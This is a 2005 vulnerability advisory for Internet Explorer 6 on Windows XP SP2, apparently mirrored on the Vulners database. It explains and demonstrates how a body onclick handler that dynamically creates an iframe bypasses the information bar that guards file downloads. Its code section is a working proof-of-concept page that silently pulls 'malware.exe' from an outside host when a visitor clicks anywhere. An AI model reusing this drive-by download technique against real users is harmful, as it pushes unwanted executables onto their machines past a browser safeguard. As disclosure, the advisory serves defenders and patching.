Vulners
Lucene search
ieBarBypass.txt
`~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Internet Explorer
Vendors: http://www.microsoft.com
Versions: 6.0.2900.2180.xpsp_sp2_rtm.040803-2158
Patched With: SP2;
Platforms: Windows
Bug: Remote File Download Information Bar Bypass
Exploitation: Remote with browser
Date: 13 Jan 2005
Author: Rafel Ivgi, The-Insider
e-mail: [email protected]
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Internet Explorer is currently the most common internet browser in the world.
Microsoft Windows XP Service Pack 2 was designed to block any file download
by an information bar which must be clicked and selected with "Download File".
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
While trying to download a file Microsoft Internet Explorer
the user gets the information bar. The information bar
mechanism blocks/catches all references to download-able files,
even through javascripts and HTML Event properties.
However Microsoft's Internet Explorer (SP2) DOES NOT CATCH
"body" tag with the HTML "onclick" event which dynamically
created "iframe" tags. For a good, more complicated dynamic
object creation i used the "createElement" function.
This way an attacker can make a user download a file with him just
clicking anywhere on the page (not on an hyperlink).
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
Paste into an htm/html file and add "<" at the begining of each line:
------------------------ cut here --------------------------------------
!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
!-- saved from url=(0031)http://theinsider.deep-ice.com/ -->
HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com</TITLE>
META http-equiv=expires content="01 Jan 1998 01:01:00 GMT">
META http-equiv=Content-Type content="text/html; charset=windows-1252">
META http-equiv=Content-Language content=en-us>
META content=True name=HandheldFriendly>
META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>
embed>
body onclick='a=document.createElement("\<iframe src=\"http:\/
\/theinsider.deep-
ice.com\/malware.exe\"\>\<\/iframe\>");document.body.appendChild
(a);setTimeout("document.execCommand\(\"refresh\")",1000)'>
cebter><br><br><br><br><br><br>Click AnyWhere You Want</center>
/BODY></HTML>
------------------------ cut here --------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S , but they will never HACK me."
--
___________________________________________________________
Sign-up for Ads Free at Mail.com
http://promo.mail.com/adsfreejump.htm
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jan 2005 00:00Current
7.4High risk
Vulners AI Score7.4